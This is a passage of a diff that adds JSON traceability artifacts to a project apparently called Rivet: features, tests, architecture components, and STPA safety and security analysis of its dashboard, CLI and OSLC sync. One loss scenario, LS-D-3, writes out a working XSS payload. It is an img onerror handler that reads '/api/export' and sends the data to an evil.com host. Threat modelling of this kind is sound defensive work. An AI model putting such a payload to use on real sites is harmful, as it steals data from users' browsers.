+      "id": "TEST-030",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "dashboard",
+        "playwright",
+        "swe-6"
+      ],
+      "title": "Dashboard Playwright end-to-end tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nCore validates artifacts before all sources have been loaded.\n",
+      "id": "UCA-C-7",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-C-25",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-25",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nReqIF adapter imports duplicate artifacts when re-importing\n\na file that was previously imported.\n",
+      "id": "UCA-Q-4",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-REQIF",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Updated aspice.yaml schema to v4.0: renamed types (unit-verification, sw-integration-verification, sw-verification, sys-integration-verification, sys-verification, verification-execution, verification-verdict), expanded method values (8 verification methods), added verification-criteria to requirement types.\n",
+      "id": "FEAT-016",
+      "links": [
+        {
+          "target": "REQ-015",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-010",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "schema",
+        "aspice",
+        "phase-1"
+      ],
+      "title": "ASPICE 4.0 schema alignment",
+      "type": "feature"
+    },
+    {
+      "description": "Generates rivet.lock containing pinned commit SHAs for each external repository. Ensures reproducible cross-repo validation by recording the exact commit used at lock time.\n",
+      "id": "FEAT-035",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "cli"
+      ],
+      "title": "rivet lock — pin externals to commits",
+      "type": "feature"
+    },
+    {
+      "description": "\nCore generates a coverage report after artifact modification\n\nbut before re-validation.\n",
+      "id": "UCA-C-8",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Validates artifacts against schema (types, required fields, link constraints, traceability rules). Produces ValidationReport with errors and warnings.\n",
+      "id": "ARCH-CORE-VALIDATE",
+      "links": [
+        {
+          "target": "REQ-003",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "validation"
+      ],
+      "title": "Validation Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nDashboard renders artifact description content containing HTML\n\ninjection without escaping.\n",
+      "id": "UCA-D-3",
+      "links": [
+        {
+          "target": "H-13",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-DASH",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "axum HTTP server serving an HTMX-powered dashboard for browsing artifacts, viewing traceability matrices, and validation results.\n",
+      "id": "FEAT-009",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-005",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ui",
+        "phase-2"
+      ],
+      "title": "HTTP serve with HTMX dashboard",
+      "type": "feature"
+    },
+    {
+      "description": "GitHub Actions workflow runs: cargo fmt (--check), cargo clippy (-D warnings), cargo test, cargo audit, cargo deny (licenses, advisories, sources), tarpaulin (coverage ≥70%), cargo miri (UB detection), cargo proptest, cargo vet (supply chain), and MSRV check. Each gate runs independently to maximize signal clarity on failure.\n",
+      "id": "FEAT-065",
+      "links": [
+        {
+          "target": "REQ-012",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ci",
+        "quality",
+        "phase-2"
+      ],
+      "title": "Comprehensive CI quality gates workflow",
+      "type": "feature"
+    },
+    {
+      "description": "Add --filter flag to rivet list, coverage, matrix, stats, and export commands. The flag accepts an s-expression string that is parsed and evaluated to filter the artifact set. Composes with existing --type and --status flags (logical AND). Also add filter support to dashboard API endpoints as a query parameter.\n",
+      "id": "FEAT-108",
+      "links": [
+        {
+          "target": "REQ-041",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-046",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "s-expression",
+        "cli",
+        "api",
+        "phase-1"
+      ],
+      "title": "CLI --filter integration for list, coverage, matrix, stats",
+      "type": "feature"
+    },
+    {
+      "description": "Schema-validated CLI mutation commands (add, modify, remove, link, unlink) with YAML 1.2.2-compliant lossless file editing.\n",
+      "id": "ARCH-CORE-MUTATE",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-034",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "mutation",
+        "yaml"
+      ],
+      "title": "Artifact Mutation Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Hand-written lexer and recursive descent parser for the MODULE.bazel Starlark subset. Produces rowan GreenNode CST with ~30 SyntaxKind variants covering module(), bazel_dep(), git_override(), archive_override(), local_path_override(), keyword arguments, string/list/boolean literals, and comments. Error recovery produces partial CST with diagnostic spans on malformed input.\n",
+      "id": "FEAT-046",
+      "links": [
+        {
+          "target": "REQ-028",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-027",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-023",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "parsing",
+        "rowan",
+        "bazel",
+        "phase-3"
+      ],
+      "title": "MODULE.bazel rowan parser with Starlark subset grammar",
+      "type": "feature"
+    },
+    {
+      "description": "\nDashboard does not display validation errors or warnings.\n",
+      "id": "UCA-D-1",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-DASH",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-O-8",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-8",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nAxum + HTMX server that renders traceability data as interactive\n\nHTML.  Primarily a read-only display controller — it does not\n\nmodify artifacts but influences developer decisions through the\n\ninformation it presents.\n",
+      "id": "CTRL-DASH",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Dashboard Server",
+      "type": "controller"
+    },
+    {
+      "description": "During 'rivet sync', an adjacent-network adversary intercepts the TLS handshake between Rivet and the OSLC server.  TLS certificate validation is disabled (tls-verify: false in rivet.yaml, a common development shortcut).  The adversary presents their own certificate, terminates the Rivet connection, and proxies modified artifact data to the legitimate OSLC server.  Injected requirements claim incorrect coverage relationships, inflating the coverage matrix.\n",
+      "id": "SLS-2",
+      "links": [
+        {
+          "target": "SUCA-OSLC-2",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-1",
+          "type": "leads-to-sec-hazard"
+        },
+        {
+          "target": "SH-5",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "OSLC MITM — adversary injects requirements via intercepted sync",
+      "type": "sec-scenario"
+    },
+    {
+      "description": "\nThe external tool uses lifecycle statuses \"Draft\",\n\"In Review\",\n\n\"Approved\",\n\"Baselined\",\nand \"Obsolete\".  Rivet's schema uses\n\n\"draft\",\n\"review\",\n\"approved\",\n\"released\".  The OSLC client maps\n\n\"Baselined\"\nto \"approved\" (closest match) rather than \"released\",\n\nbecause its process model does not include \"Baselined\" as a known\n\nstatus [UCA-O-6].  Artifacts that have been formally baselined\n\nappear as merely \"approved\" in Rivet,\ncausing auditors to question\n\nwhether the baselining step was performed [H-4].  Coverage queries\n\nthat filter by status=\"released\" miss these artifacts [H-3].\n",
+      "id": "LS-O-4",
+      "links": [
+        {
+          "target": "UCA-O-6",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-8",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Semantic mismatch in status mapping",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Configuration in rivet.yaml that maps git trailer keys (Implements, Fixes, Verifies, Satisfies, Refs) to existing schema link types. Includes exempt-types list, skip-trailer token, traced-paths for orphan detection, and trace-exempt-artifacts whitelist.\n",
+      "id": "FEAT-031",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "config",
+        "git",
+        "traceability",
+        "phase-3"
+      ],
+      "title": "Configurable trailer-to-link-type mapping",
+      "type": "feature"
+    },
+    {
+      "description": "Added rivet_get, rivet_coverage, rivet_schema, rivet_embed, rivet_snapshot_capture, rivet_add to the MCP server with proper JSON Schema inputSchema definitions.\n",
+      "id": "FEAT-102",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "MCP server expanded to 9 tools",
+      "type": "feature"
+    },
+    {
+      "description": "\nImport/export adapter for ReqIF 1.2 XML interchange format.\n\nParses SpecObjects,\nSpecRelations,\nand Specifications; maps\n\nReqIF attribute definitions to Rivet schema fields.\n",
+      "id": "CTRL-REQIF",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "ReqIF Adapter",
+      "type": "controller"
+    },
+    {
+      "description": "Integration tests for the axum HTTP dashboard server (FEAT-009). Verifies that rivet serve starts, serves the index page with correct Content-Type, returns artifact detail views, renders traceability matrix and graph pages, responds to reload endpoint, and returns proper error codes for unknown routes.\n",
+      "id": "TEST-016",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "dashboard",
+        "swe-5"
+      ],
+      "title": "Dashboard HTTP serve integration tests",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "spar:SPAR-REQ-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "parsing"
+      ],
+      "title": "Spar shall parse AADL v2.2 models",
+      "type": "requirement"
+    },
+    {
+      "description": "Rivet ingests YAML, ReqIF, or OSLC data originating from an adversary- controlled or compromised source.  The import pipeline does not authenticate the source identity, verify a cryptographic signature, or detect that the content deviates from the last-known-good baseline. In a worst-case environment where an attacker has compromised a git remote or OSLC server, this state allows wholesale replacement of safety artifacts.\n",
+      "id": "SH-1",
+      "links": [
+        {
+          "target": "SL-2",
+          "type": "leads-to-sec-loss"
+        },
+        {
+          "target": "SL-5",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet imports artifacts from an unauthorized or tampered source without detection",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-C-8",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-8",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "All expressions in rivet — CLI filters, schema traceability rules, feature model constraints, binding validation — use s-expression syntax. No infix sugar, no \"simple mode\" alternatives.\n",
+      "id": "DD-048",
+      "links": [
+        {
+          "target": "REQ-041",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "S-expressions as the single canonical expression syntax",
+      "type": "design-decision"
+    },
+    {
+      "description": "Renders petgraph link graphs as SVG using the etch layout engine. Supports interactive pan, zoom, and node dragging.\n",
+      "id": "ARCH-DASH-GRAPH",
+      "links": [
+        {
+          "target": "FEAT-009",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "dashboard",
+        "graph"
+      ],
+      "title": "Graph Visualizer (etch)",
+      "type": "aadl-component"
+    },
+    {
+      "description": "",
+      "id": "CC-C-24",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-24",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe Core validation algorithm checks that each link target exists\n\nwithin the same YAML file or directory,\nbut does not resolve links\n\nthat cross source boundaries (e.g.,\na requirement in artifacts/\n\nlinking to a design decision in a different directory or OSLC-synced\n\nsource).  The link target exists in a different source that was\n\nloaded,\nbut the resolution algorithm only searches the local source.\n\nValidation passes despite cross-source dangling links [UCA-C-4],\n\ninflating coverage metrics [H-3]\nand producing misleading\n\ncompliance reports [H-6].\n",
+      "id": "LS-C-1",
+      "links": [
+        {
+          "target": "UCA-C-4",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Validation skips cross-source link resolution",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Dispatches source loading to the appropriate adapter based on format string (generic-yaml, stpa-yaml, aadl, reqif).\n",
+      "id": "ARCH-CORE-ADAPTERS",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-005",
+          "type": "allocated-from"
+        },
+        {
+          "target": "ARCH-ADAPT-GENERIC",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-ADAPT-STPA",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-ADAPT-AADL",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-ADAPT-REQIF",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-ADAPT-WASM",
+          "type": "contains"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "adapters"
+      ],
+      "title": "Adapter Dispatch",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nLinks between artifacts (e.g.,\nREQ → DD → FEAT → TEST) reference\n\nidentifiers that have been renamed,\ndeleted,\nor moved in the source\n\nof truth.  In a worst-case environment where engineers rely on\n\nautomated link validation,\nstale references create an illusion of\n\ncomplete traceability while gaps exist.\n",
+      "id": "H-1",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet permits stale cross-references that no longer point to valid artifacts",
+      "type": "hazard"
+    },
+    {
+      "description": "Handles YAML boolean and number coercion in allowed-values checks. Emits yaml-type-coercion warnings when string fields receive non-string values.\n",
+      "id": "FEAT-084",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Type-aware allowed-values validation for YAML coercion",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-O-10",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-10",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Dashboard section for browsing external project artifacts with sync status, cross-repo link navigation, and conditional nav entry.\n",
+      "id": "FEAT-039",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "dashboard"
+      ],
+      "title": "Dashboard external project browsing",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-I-3",
+      "links": [
+        {
+          "target": "CTRL-CI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-I-3",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-M-1",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-M-1",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-IMPL-003",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Layer 1 integration: invokes spar CLI with --format json, parses output into aadl-component and aadl-analysis-result artifacts.\n",
+      "id": "ARCH-ADAPT-AADL",
+      "links": [
+        {
+          "target": "FEAT-018",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "adapter"
+      ],
+      "title": "AADL Adapter (spar integration)",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nFor any set of inputs,\nincremental validation (via salsa dependency\n\ntracking) must produce exactly the same diagnostics as a clean full\n\nvalidation pass. If incremental and full results ever diverge,\nthe\n\nsystem must detect the divergence and fall back to full validation.\n",
+      "id": "SC-11",
+      "links": [
+        {
+          "target": "H-9",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet incremental validation must produce identical results to full validation",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nThe OSLC client is writing synced artifacts to local YAML files\n\nwhen a network partition occurs.  The client has written 50 of\n\n100 artifacts when the connection to the external tool is lost.\n\nThe 50 written artifacts are updated,\nbut 50 remain stale.\n\nThe local store is now in a state that never existed in either\n\nthe pre-sync or post-sync world,\nwith some artifacts reflecting\n\nthe new state and others reflecting the old state.  Links\n\nbetween these two groups may be inconsistent.\n",
+      "id": "LS-CP-2",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Network partition during OSLC sync corrupts local state",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "REST JSON API under /api/v1/ with permissive CORS for Grafana dashboard embedding. Includes health, stats, artifacts, diagnostics, coverage endpoints plus an oEmbed provider at /oembed for rich embeds of artifact detail pages.\n",
+      "id": "FEAT-073",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "api",
+        "serve",
+        "phase-3"
+      ],
+      "title": "JSON API with oEmbed and CORS",
+      "type": "feature"
+    },
+    {
+      "description": "\nA developer creates an artifact with description containing\n\n`<img src=x onerror=\"fetch('/api/export').then(r=>r.text()).then(d=>fetch('https://evil.com/?data='+btoa(d)))\">`.\n\nThe dashboard's artifact detail view renders this description\n\nby calling html_escape() on the description string. However,\n\nthe html_escape function in document.rs is only called for\n\nmarkdown inline text,\nnot for the artifact detail view in\n\nserve.rs,\nwhich may interpolate the description directly into\n\nHTML. The script executes in the auditor's browser,\nexfiltrating\n\nthe current traceability view [H-13,\nL-2,\nL-3].\n",
+      "id": "LS-D-3",
+      "links": [
+        {
+          "target": "UCA-D-3",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-13",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Artifact description XSS via dashboard rendering",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nA project uses the cybersecurity schema with threat-scenario,\n\ncountermeasure,\nand cybersecurity-requirement types. The\n\nlifecycle completeness check in lifecycle.rs only knows about\n\nrequirement -> [feature,\naadl-component,\ndesign-decision]\n\nmappings. Cybersecurity requirements have no expected downstream\n\ntypes in the hardcoded map [UCA-C-24]. The lifecycle gap analysis\n\nreports 0 gaps for cybersecurity requirements,\neven though none\n\nhave countermeasure links. The safety engineer trusts the\n\nlifecycle check and misses genuine coverage gaps.\n",
+      "id": "LS-C-15",
+      "links": [
+        {
+          "target": "UCA-C-24",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Lifecycle check misses cybersecurity downstream requirements",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Extend the validation engine to scope traceability checks to a variant's effective artifact set. rivet validate --variant X derives features, collects bound artifacts, validates within that scope. rivet validate --all-variants iterates all defined variants. Coverage reports include per-variant breakdowns. Dashboard and API endpoints support variant scoping via query parameter.\n",
+      "id": "FEAT-113",
+      "links": [
+        {
+          "target": "REQ-045",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-046",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "validation",
+        "coverage",
+        "future"
+      ],
+      "title": "Per-variant validation and coverage reporting",
+      "type": "feature"
+    },
+    {
+      "description": "The validation pipeline is restructured as salsa tracked queries: parse → store → link_graph → conditional_rules → validate. salsa's dependency tracking enables incremental revalidation, free change impact analysis, and LSP-ready architecture. Phased adoption alongside existing serde_yaml pipeline.\n",
+      "id": "DD-024",
+      "links": [
+        {
+          "target": "REQ-029",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-023",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-024",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "validation",
+        "salsa",
+        "architecture"
+      ],
+      "title": "salsa incremental computation for the validation pipeline",
+      "type": "design-decision"
+    },
+    {
+      "description": "The CLI's 'rivet export' command provides HTML output that includes un-sanitized artifact description content when rendering to HTML.\n",
+      "id": "SUCA-CLI-2",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-4",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "CLI provides HTML export without sanitizing artifact content",
+      "type": "sec-uca"
+    },
+    {
+      "description": "\nValidation errors are present in the artifact data but the LSP\n\ndoes not surface them. Caused by:\nparse errors swallowed,\nvalidation\n\ngaps,\nstale cache,\nor missing validation phases.\n",
+      "id": "H-LSP-001",
+      "links": [
+        {
+          "target": "L-LSP-001",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP reports no errors when validation errors exist (false negative)",
+      "type": "hazard"
+    },
+    {
+      "description": "Restructure the validation pipeline as salsa tracked queries. Input queries for file contents, tracked queries for parse_artifacts, merged_schema, artifact_store, link_graph, evaluate_conditional_rules, and validate. Phased adoption alongside existing serde_yaml pipeline with feature flag for opt-in. Enables incremental revalidation, free change impact analysis, and LSP-ready architecture.\n",
+      "id": "FEAT-047",
+      "links": [
+        {
+          "target": "REQ-029",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-023",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-024",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "validation",
+        "salsa",
+        "architecture",
+        "phase-3"
+      ],
+      "title": "salsa validation database with incremental query groups",
+      "type": "feature"
+    },
+    {
+      "description": "\nA corruption or semantic error introduced in one tool (e.g.,\na\n\nbulk-edit mistake in Polarion) is propagated via OSLC sync to\n\nRivet's local store and then onward to other connected tools,\n\namplifying a single-tool error into a multi-tool data integrity\n\nincident.\n",
+      "id": "H-8",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet propagates errors bidirectionally across connected tools",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe CI workflow triggers rivet validate only when files in the\n\nartifacts/ directory change.  A developer adds a new artifact\n\nsource directory (e.g.,\nsafety/stpa/) to rivet.yaml but does\n\nnot update the CI path filter.  Changes to STPA artifacts bypass\n\nvalidation entirely [UCA-I-1].  Broken links in the STPA\n\nartifacts are merged into main without detection [H-1,\nH-3].\n",
+      "id": "LS-I-1",
+      "links": [
+        {
+          "target": "UCA-I-1",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "CI path filter excludes new artifact directories",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "axum HTTP server with HTMX-driven dashboard. Server-rendered HTML fragments, no frontend framework. Includes pan/zoom/drag graph visualization, artifact hover previews, and Cmd+K search.\n",
+      "id": "ARCH-DASH-001",
+      "links": [
+        {
+          "target": "FEAT-009",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-007",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "dashboard"
+      ],
+      "title": "Dashboard System",
+      "type": "aadl-component"
+    },
+    {
+      "description": "When the dashboard is bound to a non-localhost address (e.g., 0.0.0.0), it provides full artifact content to any client that connects, without requiring authentication.\n",
+      "id": "SUCA-DASH-1",
+      "links": [
+        {
+          "target": "CTRL-DASH",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-3",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Dashboard provides artifact content to unauthenticated network requests",
+      "type": "sec-uca"
+    },
+    {
+      "description": "Tests for salsa validation database (FEAT-047 and FEAT-048). Verifies input query setup for file contents, tracked query invalidation on file change, incremental parse_artifacts recomputation, schema merge caching, conditional rule evaluation as tracked queries, dependency tracking for artifact field values, and equivalence between incremental and full validation results.\n",
+      "id": "TEST-024",
+      "links": [
+        {
+          "target": "REQ-029",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "validation",
+        "salsa",
+        "swe-5"
+      ],
+      "title": "Salsa incremental validation database tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe Core coverage computation counts all edges in the link graph\n\nas valid trace relationships,\nregardless of whether the link type\n\n(satisfies,\nrefines,\nverifies,\nimplements) is semantically\n\nappropriate for the coverage query.  An artifact with only\n\n\"related-to\"\nlinks is counted as fully traced [UCA-C-5].\n\nCoverage metrics show 100% when actual requirement-to-test\n\ncoverage is incomplete [H-3].\n",
+      "id": "LS-C-2",
+      "links": [
+        {
+          "target": "UCA-C-5",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Coverage counts untyped links as valid traces",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Validates loaded schemas are well-formed: checks link types exist, target types exist, traceability rule references valid. Found 3 real errors in AADL cross-schema references.\n",
+      "id": "FEAT-103",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "rivet schema validate command",
+      "type": "feature"
+    },
+    {
+      "description": "\nAn AI agent queries rivet via MCP and receives wrong data\n\n(stale validation,\nincorrect artifact list,\nwrong stats).\n\nAgent makes decisions based on incorrect information.\n",
+      "id": "L-IMPL-002",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "MCP tool returns invalid or inconsistent results",
+      "type": "loss"
+    },
+    {
+      "description": "",
+      "id": "DD-030",
+      "links": [
+        {
+          "target": "REQ-033",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
